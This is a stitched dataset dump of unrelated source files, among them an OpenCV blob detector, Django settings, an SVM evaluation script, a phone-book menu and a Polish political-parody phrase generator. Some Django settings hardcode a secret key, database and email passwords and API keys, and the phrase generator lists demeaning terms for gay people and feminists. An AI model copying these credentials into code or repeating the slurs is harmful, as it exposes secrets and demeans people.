# Convexity Parameters
params.filterByConvexity = True
params.minConvexity = 0.85
params.maxConvexity = 1
# Set up detector
detector = cv2.SimpleBlobDetector(params)
# Detect blobs
all_keypoints = detector.detect(img)
size = all_keypoints[0].size
print "Size: " + str(size)
all_drops = len(all_keypoints)
print "All drops: " + str(all_drops)
return all_keypoints
def stats(self, diameter_list):
sorted_list = diameter_list.sort(key=float)
list_length = len(sorted_list)
index = (list_length - 1) // 2
if list_length % 2:
num_median = sorted_list[index]
else:
num_median = (sorted_list[index] + sorted_list[index + 1]) / 2
for diameter in sorted_list:
total_area = diameter * 3.14159 * 0.25
current_area = 0
i = 0
while current_area <= total_area:
current_area += sorted_list[i] * 3.14159 * 0.25
vol_median = (sorted_list[i] + sorted_list[i - 1]) / 2
def output(self, img, all_keypoints, single_keypoints, double_keypoints, triple_keypoints):
# Draw detected blobs with circles around them
im_with_keypoints = cv2.drawKeypoints(img, all_keypoints, np.array([]), (255,255,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
#im_with_keypoints = cv2.drawKeypoints(im_with_keypoints, single_keypoints, np.array([]), (0, 0, 255))
#im_with_keypoints = cv2.drawKeypoints(im_with_keypoints, double_keypoints, np.array([]), (0, 255, 0))
#im_with_keypoints = cv2.drawKeypoints(im_with_keypoints, triple_keypoints, np.array([]), (255, 0, 0))
cv2.imshow("im_with_keypoints", im_with_keypoints)
cv2.waitKey(0)
cv2.destroyAllWindows()
if __name__ == "__main__":
blobs = blob_detector()
blobs.main()
|
[
"ryan.ackett@gmail.com"
] |
ryan.ackett@gmail.com
|
14117448fe850d69ae5fcf1bd41049c19247b557
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/appmesh_write_2/virtual-router_delete.py
|
db6df7702ffc69ca7d3bbf5c3eda2b1680913ce2
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379
| 2020-12-27T13:38:45
| 2020-12-27T13:38:45
| 318,686,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,343
|
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_two_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/delete-virtual-router.html
if __name__ == '__main__':
"""
create-virtual-router : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/create-virtual-router.html
describe-virtual-router : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/describe-virtual-router.html
list-virtual-routers : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/list-virtual-routers.html
update-virtual-router : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/update-virtual-router.html
"""
parameter_display_string = """
# mesh-name : The name of the service mesh to delete the virtual router in.
# virtual-router-name : The name of the virtual router to delete.
"""
add_option_dict = {}
add_option_dict["parameter_display_string"] = parameter_display_string
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
write_two_parameter("appmesh", "delete-virtual-router", "mesh-name", "virtual-router-name", add_option_dict)
|
[
"hcseo77@gmail.com"
] |
hcseo77@gmail.com
|
3bad8e294dbb199e5e40870811281cceb64d295c
|
cd1465251c5b4536f8d0c634c0efaff4d628c87c
|
/Semantic_Analysers/ColourAnalyser.py
|
cfea4b8096683c0c4cb9bfcef3f1d8532d6f9037
|
[] |
no_license
|
BennyMurray/Scoop
|
9794bca1d1d4b159e041a8c482a256de852a9e6d
|
01f9c31affbb291a5507d86ab88a637a2dafea28
|
refs/heads/master
| 2021-03-27T18:54:21.094647
| 2017-07-16T21:25:24
| 2017-07-16T21:25:24
| 77,929,600
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,208
|
py
|
from __future__ import division
def analyseColour(word_list):
num_set = [0.33, 1.68, 2.2, 2.36, 2.87, 0.29, 0.27, 2.94, 0.81, 0.22, 2.59, 1.06]
colour_value_list = [
(1, ["pale"], num_set[0]),
(3, ["straw"], num_set[1]),
(4, ["yellow"], num_set[2]),
(5, ["gold"], num_set[3]),
(8, ["amber"], num_set[4]),
(12, ["red"], num_set[5]),
(16, ["copper"], num_set[6]),
(18, ["murky"], num_set[7]),
(21, ["brown"], num_set[8]),
(26, ["muddy"], num_set[9]),
(32, ["black"], num_set[10]),
(37, ["opaque"], num_set[11])
]
colour_result_dict = {
1: 0,
3: 0,
4: 0,
5: 0,
8: 0,
12: 0,
16: 0,
18: 0,
21: 0,
26: 0,
32: 0,
37: 0
}
for word in word_list:
for colour_value in colour_value_list:
for descriptor_list in colour_value[1]:
if word in descriptor_list:
colour_result_dict[colour_value[0]] += colour_value[2]
sorted_dictionary = sorted(colour_result_dict.items(), key=lambda x: x[1], reverse=True)
return sorted_dictionary[0][0]
|
[
"bjamurray@gmail.com"
] |
bjamurray@gmail.com
|
80c27b9d221f59ad4887eeb126cb5bc7715df2fd
|
0bb0bf1326fb0111816c92193de5bf83201f5895
|
/Desafio 2 (Lista telefonica)/Resolução Python/telefonica.py
|
8402e49621faa8f1c714a52e6490c6ca9cdb535d
|
[] |
no_license
|
pipefep/EstruturaDeDados
|
3c668d014f7979fae1e4a3720caafbbc24f4ed80
|
4c05263b76d5d6fbbe20d8cf88e9c25107f74e83
|
refs/heads/master
| 2020-08-02T16:07:55.823833
| 2019-03-05T21:02:59
| 2019-03-05T21:02:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,718
|
py
|
# Versão: Python 3.6.7
from os import system # Importa da biblioteca OS a função System, para atividades usando o sistema operacional.
vetA = [] # Declarar que existe um vetor/lista em "vetA".
# Função para imprimir uma linha.
def linha():
print("----------------")
# Função para adicionar o número da pessoa.
def adicionar():
linha()
# Pegar o número da pessoa.
novoNum = input("Digite o Número: ")
# Adiciona o número no vetor/lista "vetA".
vetA.append(novoNum)
linha()
# Função para buscar se existe um número inserido.
def buscar():
linha()
# Pegar o número para a busca.
proc = input("Digite o Número para a Busca: ")
# Se o que foi digitado em "proc" estiver dentro do "vetA", irá retornar "True" e executará o if.
# Se o que foi digitado em "proc" NÃO estiver dentro do "vetA", o número não existe e executará o else.
if(proc in vetA):
print("\nO número {} EXISTE na lista telefonica!".format(proc))
else:
print("\nO número {} NÃO EXISTE na lista telefonica!".format(proc))
linha()
# Função para excluir um número que foi inserido.
def excluir():
linha()
# Pegar o número para a exclusão.
exc = input("Digite o Número para remover da Lista: ")
if(exc in vetA): # Irá excluir o número se ele existir na lista "vetA".
vetA.remove(exc)
else: # Caso o número não exista, irá retornar a mensagem abaixo.
print("\nO número {} NÃO EXISTE na lista telefonica!".format(exc))
linha()
# Função para listar todos os números existentes.
def listar():
linha()
j = len(vetA) # Define um valor para "j" de acordo com o tamanho da lista "vetA"
for i in range(0, j): # Imprime uma vez na tela a lista com todos os elementos enumerados
print("{}. {}".format(i+1,vetA[i]))
linha()
# Loop para voltar ao menu.
while True:
# Menu para usuário
print("\n--- Lista telefonica ---\n")
print("- Digite uma operação -\n")
print("[1] Inserir um novo telefone.")
print("[2] Buscar um determinado telefone.")
print("[3] Remover um determinado telefone.")
print("[4] Listar todos os telefones.\n")
# Escolha para cada função.
esc = int(input("Digite a Escolha: "))
# Limpar o console, se o OS for linux = system('clear') ; se for windows = system('cls').
system('clear')
# Dependendo de qual foi a escolha, de acordo com o menu acima, ele irá executar a função escolhida.
if(esc == 1):
adicionar()
elif(esc == 2):
buscar()
elif(esc == 3):
excluir()
elif(esc == 4):
listar()
else:
print("\nOPÇÃO INVÁLIDA!\n")
|
[
"noreply@github.com"
] |
noreply@github.com
|
53fa6c563e9983afb729af1af3be08c9c03dd4a1
|
8792e3449fbc6c8dec99f6af1d9f1b4caddad1f7
|
/51player.py
|
470f81860462904d56f98294142a2c26cd476828
|
[] |
no_license
|
aarthisandhiya/aarthisandhiya1
|
c19c1951c9ba01cd97eeddd44614953088718357
|
e6f10247b6a84d6eaf371a23f2f9c3bebbc73e5b
|
refs/heads/master
| 2020-04-15T17:17:07.151242
| 2019-05-20T05:24:19
| 2019-05-20T05:24:19
| 164,868,494
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 202
|
py
|
a=int(input())
s=[int(a) for a in input().split()]
s=list(s)
z=[]
for i in range(0,len(s)):
val=s[i]
i=i-1
while i>=0:
if val<s[i]:
s[i+1]=s[i]
s[i]=val
i=i-1
else:
break
print(s[1])
|
[
"noreply@github.com"
] |
noreply@github.com
|
c5c0efac5b659bbee446fae9d8a327987f1d99ea
|
222ffb1996699dc5e0cb5e1c239698b872003c8d
|
/03_Multiply.py
|
25ef5ced75ea4642a8dfeba6f61b0335756cb142
|
[] |
no_license
|
AdityaSA99/IoT-Programs
|
3dcbf8ff24a978b530b0ada02a2b7ad5ed378462
|
20c5e910e20529bff648fa5523296f8712c6faeb
|
refs/heads/master
| 2020-05-31T06:27:28.901576
| 2019-06-10T15:40:43
| 2019-06-10T15:40:43
| 190,142,164
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
a = float(input("Enter value of A :"))
b = float(input("Enter value of B :"))
c = a*b
print(("Product of {0} and {1} is {2}").format(a,b,c))
|
[
"noreply@github.com"
] |
noreply@github.com
|
a4b5aa67b31a6384126ccb1f35d8fff5774c6f6b
|
bf6626d2f70ef72963eb6290bdcf44dc75531aa1
|
/hoodwatch/settings.py
|
77ae46e54251375fc08635b55d0fde36cbd22c3e
|
[
"MIT"
] |
permissive
|
amtesire/Hood-project
|
c70930f110668a9549809f329543e62d9c036750
|
8078a2c85ba06cdddab54a4960168fb2e237e122
|
refs/heads/master
| 2023-02-23T19:50:39.233884
| 2021-02-02T14:53:28
| 2021-02-02T14:53:28
| 334,227,281
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,411
|
py
|
"""
Django settings for hoodwatch project.
Generated by 'django-admin startproject' using Django 2.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import django_heroku
import dj_database_url
from decouple import config,Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=False, cast=bool)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'crispy_forms',
'hood',
'pyuploadcare.dj',
]
UPLOADCARE = {
'pub_key': '2b709bca64245dd9e55e',
'secret': '0a60851de5f3db2dc728',
}
CRISPY_TEMPLATE_PACK = 'bootstrap4'
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hoodwatch.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hoodwatch.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
MODE=config("MODE", default="dev")
# development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
'HOST': config('DB_HOST'),
'PORT': '',
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Kigali'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# configuring the location for media
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
LOGIN_REDIRECT_URL = 'index'
LOGOUT_REDIRECT_URL = 'index'
# Configure Django App for Heroku.
django_heroku.settings(locals())
|
[
"tesiregisele@gmail.com"
] |
tesiregisele@gmail.com
|
4067ade06122e3a02c1b9d764ce69d8d86e992ac
|
833c09e68b7dca5b71bee89c81578404d05feaf0
|
/ch5/a57.py
|
1e9c4188b3d65218c2ba064780cbfee244d370d7
|
[] |
no_license
|
muu4649/NLP100nock2020
|
669fa68f2f3b7f7a7deb4402cdaf7d9fd8aaf372
|
0031ac9b82135a81787dc3e5c77728a6d30c06c6
|
refs/heads/master
| 2022-10-24T22:27:30.785381
| 2020-06-11T22:31:06
| 2020-06-11T22:31:06
| 268,445,835
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 748
|
py
|
#52で学習したロジスティック回帰モデルの中で,重みの高い特徴量トップ10と,重みの低い特徴量トップ10を確認せよ.
import pandas as pd
import joblib
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
#X_train = pd.read_table('train.feature.txt', header=None)
#y_train = pd.read_table('train2.txt', header=None)[1]
clf = joblib.load('model.joblib')
vocabulary_ = joblib.load('vocabulary_.joblib')
coefs = clf.coef_
for c in coefs:
d = dict(zip(vocabulary_, c))
d_top = sorted(d.items(), key=lambda x: abs(x[1]), reverse=True)[:10]
print(d_top)
d_bottom = sorted(d.items(), key=lambda x: abs(x[1]), reverse=False)[:10]
print(d_bottom)
|
[
"noreply@github.com"
] |
noreply@github.com
|
6b671ac29a86fe4af2a6cb41bb64ef17873657cf
|
c82e0c7ccb30e4f36c58957799e3a771efaff489
|
/btre/btre/settings.py
|
a71715265daa4ef05e5fe3d6ebfebc1bf7ad5098
|
[] |
no_license
|
kneeyaa/btre
|
36bf54811281d8c1a9918e9f39a44e9096324cb5
|
c3973e0c231d0f3d28c00b193e742a82408e0d29
|
refs/heads/master
| 2022-03-29T11:09:14.263730
| 2019-11-03T07:17:26
| 2019-11-03T07:17:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,955
|
py
|
"""
Django settings for btre project.
Generated by 'django-admin startproject' using Django 2.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
from django.contrib.messages import constants as messages
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'q_2gu@fzb=v*1f36f&tnuw0ejcm_cv2+%_bqoggyn^yhjm_kzk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'pages.apps.PagesConfig',
'listings.apps.ListingsConfig',
'realtors.apps.RealtorsConfig',
'accounts.apps.AccountsConfig',
'contacts.apps.ContactsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'btre.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATES_DIR, ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'btre.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'btredb',
'USER': 'postgres',
'PASSWORD': 'XevX21@NY',
'HOST': 'localhost',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'btre/static')
]
# Media Folder Setting
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
MESSAGE_TAGS = {
messages.ERROR: 'danger',
}
# Email Config
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST_USER = 'niya.contact@gmail.com'
EMAIL_HOST_PASSWORD = 'XevX21@NY'
|
[
"220497+KrNiYa@users.noreply.github.com"
] |
220497+KrNiYa@users.noreply.github.com
|
7d8b85fbd6ee38f75738a568080c51ef08cbef54
|
2499c41e3c8cee44cdf5fed3ac917b921306c537
|
/features/environment.py
|
d0b7b79184a56b0bab57707c098a15764dfc3126
|
[
"BSD-3-Clause"
] |
permissive
|
aduston-snaplogic/nextbus_client
|
27fb4f45f5b9ab6b0b8d0af532db192235d17c81
|
b9f69e38683d22a832d93bbd98f561a1b7e51358
|
refs/heads/master
| 2021-09-03T09:14:41.069777
| 2018-01-08T00:47:50
| 2018-01-08T00:47:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,502
|
py
|
"""
environment.py - Set up the environment for the behave tests.
"""
import nextbus_client
import pickle
def before_all(context):
# Configure the client
context.client = nextbus_client.Client()
context.base_url = context.client.api_url
context.headers = context.client.headers
def before_feature(context, feature):
if 'client' in feature.tags:
context.mocks_directory = './features/mocks/client'
def before_tag(context, tag):
if tag == 'agencyList':
pickle_file = "{0}/{1}".format(context.mocks_directory, 'agency_list.p')
context.agency_list_sample = pickle.load(open(pickle_file, 'rb'))
if tag == 'routeList':
pickle_file = "{0}/{1}".format(context.mocks_directory, 'route_list_sf-muni.p')
context.route_list_sample = pickle.load(open(pickle_file, 'rb'))
if tag == 'routeConfig':
pickle_file = "{0}/{1}".format(context.mocks_directory, 'route_config_sf-muni_N.p')
context.route_config_sample = pickle.load(open(pickle_file, 'rb'))
if tag == 'predictions':
pickle_file = "{0}/{1}".format(context.mocks_directory, 'predictions_sf-muni_N_5205.p')
context.predictions_sample = pickle.load(open(pickle_file, 'rb'))
if tag == 'predictionsForMultiStops':
pickle_file = "{0}/{1}".format(context.mocks_directory, 'multi_stop_predictions_sf-muni_N_6997_3909.p')
context.multi_stop_predictions_sample = pickle.load(open(pickle_file, 'rb'))
|
[
"adamduston@gmail.com"
] |
adamduston@gmail.com
|
3a5e3c2e15f0e9ec3f7c4f139ac435cef942c429
|
84b08a60e49e702e51b8c3bd0c558fbd957e11ae
|
/LatestAlgorithms/SVM.py
|
28692dc75e49da2349af66a00b5e9ad5073e963c
|
[] |
no_license
|
akhalayly/GoldenBoy
|
787732656250bc52ad0076dca35f15abbd2f4f14
|
fb88b656525c3bc614a24b982acf4d1ae745aa8b
|
refs/heads/main
| 2023-02-06T02:17:53.197336
| 2020-12-28T20:07:14
| 2020-12-28T20:07:14
| 304,894,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,205
|
py
|
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.model_selection import KFold
from sklearn.feature_selection import SelectKBest, chi2
from sklearn import svm
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import Positions_Traits as posT
import helperFunctions as hf
if __name__ == '__main__':
files = ["CAMS", "CBs", "CMs", "CDMs", "GKs", "LBs", "LMs", "RBs", "RMs",
"Strikers"]
for file in files:
dataset = pd.read_csv("Success_" + file + ".csv")
attrbs = []
attrbs = attrbs + hf.roleTraitIndexesFinder(["Age"], dataset.columns, hf.year_2012)
attrbs = attrbs + hf.roleTraitIndexesFinder(posT.General_Info, dataset.columns, "")
attrbs = attrbs + hf.roleTraitIndexesFinder(posT.Positive_Traits, dataset.columns, hf.year_2012)
for role in posT.positionToTraits[file]:
attrbs = attrbs + hf.roleTraitIndexesFinder(role, dataset.columns, hf.year_2012)
attrbs = list(set(attrbs))
X = dataset.iloc[:, attrbs].values.astype(float)
y = dataset.iloc[:, -1].values
X = hf.normalizeAge(hf.normalizeMarketValue(hf.normalizeCA(X, 1), -1, file), 0)
# X = SelectKBest(chi2, k=10).fit_transform(X, y)
kf = KFold(n_splits=5)
splits = []
kernel_results = {
'linear': [],
'poly': [],
'rbf': [],
'sigmoid': []
}
for train, test in kf.split(X):
splits.append((train, test))
for kernel in ['linear', 'poly', 'rbf', 'sigmoid']:
c_kernel_results = [0] * 6
index = 0
for c in [0.01, 0.1, 0.5, 1, 2, 5]:
for train_index, test_index in splits:
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
clf = svm.SVC(kernel=kernel, C=c)
clf.fit(X_train, y_train)
pred_i = clf.predict(X_test)
choseOne = 0
choseZero = 0
c_kernel_results[index] += ((1 - np.mean(pred_i != y_test)) / splits.__len__())
index += 1
kernel_results[kernel] = c_kernel_results
# print("Timo prediction is: " + str(clf.predict([X[111]])[0]))
# for i in range(len(pred_i)):
# if pred_i[i] != y_test[i] and pred_i[i] == 1:
# choseOne = choseOne + 1
# elif pred_i[i] != y_test[i]:
# choseZero = choseZero + 1
# print("choseZero: " + str(len(pred_i) - sum(pred_i)) + " choseZero: " + str(
# choseZero) + " Ratio of wrong Zeros: " + str(choseZero / (len(pred_i) - sum(pred_i))))
# print("choseOne: " + str(sum(pred_i)) + " choseOneWrong: " + str(
# choseOne) + " Ratio of wrong Ones: " + str(choseOne / sum(pred_i)))
print(kernel + " Last Accuracy is: " + str(kernel_results[kernel]))
plt.figure(figsize=(12, 6))
plt.plot([0.01, 0.1, 0.5, 1, 2, 5], kernel_results['linear'], color='red', marker='o',
markerfacecolor='red', markersize=10)
plt.plot([0.01, 0.1, 0.5, 1, 2, 5], kernel_results['poly'], color='blue', marker='o',
markerfacecolor='blue', markersize=10)
plt.plot([0.01, 0.1, 0.5, 1, 2, 5], kernel_results['rbf'], color='black', marker='o',
markerfacecolor='black', markersize=10)
plt.plot([0.01, 0.1, 0.5, 1, 2, 5], kernel_results['sigmoid'], color='brown', marker='o',
markerfacecolor='brown', markersize=10)
plt.title('Accuracy Rate SVM ' + file)
plt.xlabel('C Value')
plt.ylabel('Mean Accuracy')
plt.legend([str(i) for i in kernel_results.keys()])
plt.show()
|
[
"noreply@github.com"
] |
noreply@github.com
|
f4144879abb95c5a24464b291c1a13b6c973d8f5
|
9ca1ed4689a90b880c2ffcf18661bccedc62e8d6
|
/BeautifulSoup1.py
|
c714f658017e46b5fa77706a6ce92e554085bcfe
|
[] |
no_license
|
Beena1995/hello-world
|
c7e77a6b1569cbf7988f21f8dd4a4509a080ac60
|
1fd207bc2fb49dd7ae537645cffe17fc6900e41c
|
refs/heads/master
| 2021-05-03T12:15:08.527619
| 2016-10-06T08:17:26
| 2016-10-06T08:17:26
| 70,133,029
| 0
| 0
| null | 2016-10-06T08:14:15
| 2016-10-06T07:39:03
| null |
UTF-8
|
Python
| false
| false
| 292
|
py
|
import urllib
from BeautifulSoup import*
url=raw_input('Enter url:')
html=urllib.urlopen(url).read()
soup=BeautifulSoup(html)
tags=soup('a')
for tag in tags:
print 'TAG:',tag
print 'URL:',tag.get('href',None)
print 'Content:',tag.contents[0]
print 'Attrs:',tag.attrs
|
[
"noreply@github.com"
] |
noreply@github.com
|
d3ae04ec689b0df5817ece49cecea5ae6c4698d0
|
54fb38832e2f06a376c02d0fb106b5a9321279c9
|
/korwin.py
|
201dbde8a11525196493caad24f9bfb329365908
|
[
"Unlicense"
] |
permissive
|
sqbi-q/korwin
|
6c73cbf5c93fe6a0cdebb68505ebfa3d4e364849
|
c3762e1c9210710c59d7d59644bd023ab7ea4856
|
refs/heads/master
| 2023-01-23T03:40:57.526261
| 2020-12-04T08:38:14
| 2020-12-04T08:38:14
| 261,270,327
| 0
| 0
|
Unlicense
| 2020-05-04T18:57:21
| 2020-05-04T18:57:20
| null |
UTF-8
|
Python
| false
| false
| 6,051
|
py
|
from random import choice
parts = [
[
"Proszę zwrócić uwagę, że",
"I tak mam trzy razy mniej czasu, więc prosze pozwolić mi powiedzieć:",
"Państwo się śmieją, ale",
"Ja nie potrzebowałem edukacji seksualnej, żeby wiedzieć, że",
"No niestety:",
"Gdzie leży przyczyna problemu? Ja państwu powiem:",
"Państwo chyba nie widzą, że",
"Oświadczam kategorycznie:",
"Powtarzam:",
"Powiedzmy to z całą mocą:",
"W Polsce dzisiaj",
"Państwo sobie nie zdają sprawy, że",
"To ja przepraszam bardzo:",
"Otóż nie wiem czy pan wie, że",
"Yyyyy...",
"Ja chcę powiedzieć jedną rzecz:",
"Trzeba powiedzieć jasno:",
"Jak powiedział wybitny krakowianin Stanisław Lem,",
"Proszę mnie dobrze zrozumieć:",
"Ja chciałem państwu przypomnieć, że",
"Niech państwo nie mają złudzeń:",
"Powiedzmy to wyraźnie:"
],
[
"właściciele niewolników",
"związkowcy",
"trockiści",
"tak zwane dzieci kwiaty",
"rozmaici urzędnicy",
"federaści",
"etatyści",
"ci durnie i złodzieje",
"ludzie wybrani głosami meneli spod budki z piwem",
"socjaliści pobożni",
"socjaliści bezbożni",
"komuniści z krzyżem w zębach",
"agenci obcych służb",
"członkowie Bandy Czworga",
"pseudo-masoni z Wielkiego Wschodu Francji",
"przedstawiciele czerwonej hołoty",
"ci wszyscy (tfu!) geje",
"funkcjonariusze reżymowej telewizji",
"tak zwani ekolodzy",
"ci wszyscy (tfu!) demokraci",
"agenci bezpieki",
"feminazistki"
],
[
"po przeczytaniu Manifestu Komunistycznego",
"którymi się brzydzę",
"których nienawidzę",
"z okolic Gazety Wyborczej",
"czyli taka żydokomuna",
"odkąd zniesiono karę śmierci",
"którymi pogardzam",
"których miejsce w normalnym kraju jest w więzieniu",
"na polecenie Brukseli",
"posłusznie",
"bezmyślnie",
"z nieprawdopodobną pogardą dla człowieka",
"za pieniądze podatników",
"zgodnie z ideologią LGBTQZ",
"za wszelką cenę",
"zupełnie bezkarnie",
"całkowicie bezczelnie",
"o poglądach na lewo od komunizmu",
"celowo i świadomie",
"z premedytacją",
"od czasów Okrągłego Stołu",
"w ramach postępu"
],
[
"udają homoseksualistów",
"niszczą rodzinę",
"idą do polityki",
"zakazują góralom robienia oscypków",
"organizują paraolimpiady",
"wprowadzają ustrój, w którym raz na cztery lata można wybrać sobie pana",
"ustawiają fotoradary",
"wprowadzają dotacje",
"wydzielają buspasy",
"podnoszą wiek emerytalny",
"rżną głupa",
"odbierają dzieci rodzicom",
"wprowadzają absurdalne przepisy",
"umieszczają dzieci w szkołach koedukacyjnych",
"wprowadzają parytety",
"nawołują do podniesienia podatków",
"próbują wyrzucić kierowców z miast",
"próbują skłócić Polskę z Rosją",
"głoszą brednie o globalnym ociepleniu",
"zakazują posiadania broni",
